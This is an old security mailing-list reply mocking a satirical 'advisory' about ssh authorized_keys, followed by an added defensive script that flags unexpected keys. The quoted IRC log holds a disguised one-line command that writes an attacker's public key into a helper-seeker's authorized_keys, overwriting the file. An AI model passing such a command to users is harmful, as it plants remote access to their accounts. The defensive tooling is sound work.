This is NOT a problem of ssh, but of the USER. This is called "Social Engineering", and nobody can protect against that. Only the intelligence of the user can avoid this "HOLE".

This is the worst thing I've ever seen...

E.
--
Eric LeBlanc
[EMAIL PROTECTED]
--------------------------------------------------
UNIX is user friendly. It's just selective about who its friends are.
==================================================

On Tue, 4 Mar 2003 [EMAIL PROTECTED] wrote:

> I. BACKGROUND
>
> (stolen from manpage)
> ssh (SSH client) is a program for logging into a remote machine and for
> executing commands on a remote machine. It is intended to replace rlogin
> and rsh, and provide secure encrypted communications between two untrusted
> hosts over an insecure network. X11 connections and arbitrary TCP/IP
> ports can also be forwarded over the secure channel.
>
> II. DESCRIPTION
>
> The ssh command contains an innate system of backdooring that can be leveraged
> by an attacker to gain access as another user.
>
> The crux of this problem lies in the fact that any public key dropped into
> ~/.ssh/authorized_keys may be used to gain entry to the machine under the
> privileges of that user by whoever possesses the corresponding private key.
>
> III. ANALYSIS
>
> A user who can successfully convince another user to write his ssh public key
> to ~/.ssh/authorized_keys will be able to gain access to that machine under
> that user's privileges.
>
> The following is a sample walkthrough of a successful exploitation of this
> vulnerability.
>
> zerofel [EMAIL PROTECTED] has joined #linuxhelp
> <zerofel> how do i use ntp to set my time?
> <sup3rfo0> echo ntp;echo "ssh-rsa
> AAAAB3NzaC1yc2EAAAABIwAAAIEAsWihy/NGclBRhEVNgQezRGSx9D0AMqDY/eGYMNW9WlO/szVRKrlGYpMmsvOen/Kcocz0TxDPDZXLGGDL0U77A036WBIL64HPAg3ADteSa1heDJjxUWMa45Aj0bhBEJCofkraasOwxTgKYe6KXCKQu9GOS+VoCYUSSJtUk11G+tE=
> [EMAIL PROTECTED]">~/.ssh/authorized_keys
> <sup3rfo0> that should do it
> <zerofel> okay but my date still isnt set
> <sup3rfo0> hmm paste the output of ls ~
> <zerofel> bash-2.05$ ls
> <zerofel> HAHA_I_DELETED_ALL_YOUR_FILES
> <zerofel> WTF
>
> IV. VENDOR RESPONSE
>
> I have informed ssh developers about this vulnerability and they have not
> replied. I am forced to disclose this gaping vulnerability to force them
> to patch the bug.
>
> V. PROPS
>
> iDEFENSE for their elite file advisory
> http://lists.netsys.com/pipermail/full-disclosure/2003-March/004423.html
> these warriors of full-disclosure give me the courage to release this
> vulnerability even after death threats from evil blackhats who shut off
> my power, ruined my credit, and got me fired from my job.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
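A defender-side check for the authorized_keys mechanism the quoted advisory is built on, added here as an example that is not code from the post or from the OpenSSH project: it parses a user's authorized_keys file, computes each key's SHA256 fingerprint in the form `ssh-keygen -lf` reports it, and lists entries that are malformed or whose fingerprint is not on an admin's provisioning list. The file contents, key bodies and names (alice@laptop, sup3rfo0) are constructed for the example.

```python
import base64
import hashlib
import re
# authorized_keys line layout: [options] key-type base64-blob [comment]
KEY_TYPES = r"ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521)"
LINE_RE = re.compile(rf"(?:^|\s)({KEY_TYPES})\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$")

def fingerprint(b64_blob):
    """SHA256 fingerprint in the form ssh-keygen -lf prints it."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """One dict per key line; blank lines and # comments are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.search(line)
        if not m:
            entries.append({"line": lineno, "error": "unparseable line"})
            continue
        entry = {"line": lineno, "options": line[:m.start()].strip(),
                 "type": m.group(1), "comment": m.group(3) or ""}
        try:
            entry["fingerprint"] = fingerprint(m.group(2))
        except ValueError:  # binascii.Error (bad padding etc.) is a ValueError
            entry["error"] = "bad base64 key blob"
        entries.append(entry)
    return entries

def unexpected_keys(text, allowed_fingerprints):
    """Entries nobody provisioned: unknown fingerprint, or malformed line."""
    return [e for e in parse_authorized_keys(text)
            if "error" in e or e["fingerprint"] not in allowed_fingerprints]

# Constructed sample (not from the post). Key bodies are dummy bytes in the
# SSH wire format, not real keys; only parsing and fingerprinting are exercised.
def _dummy_blob(key_type, body_len):
    t, k = key_type.encode(), bytes([7]) * body_len
    raw = len(t).to_bytes(4, "big") + t + len(k).to_bytes(4, "big") + k
    return base64.b64encode(raw).decode()
ADMIN_KEY = _dummy_blob("ssh-ed25519", 32)
PLANTED_KEY = _dummy_blob("ssh-rsa", 64)
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# provisioned by the admin",
    f"ssh-ed25519 {ADMIN_KEY} alice@laptop",
    f'command="/bin/true" ssh-rsa {PLANTED_KEY} sup3rfo0',  # pasted by a "helper"
])
```

Running `unexpected_keys(SAMPLE_AUTHORIZED_KEYS, {fingerprint(ADMIN_KEY)})` reports only the planted ssh-rsa entry; comparing fingerprints against an inventory, rather than eyeballing the file, is what catches a key somebody was talked into pasting.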
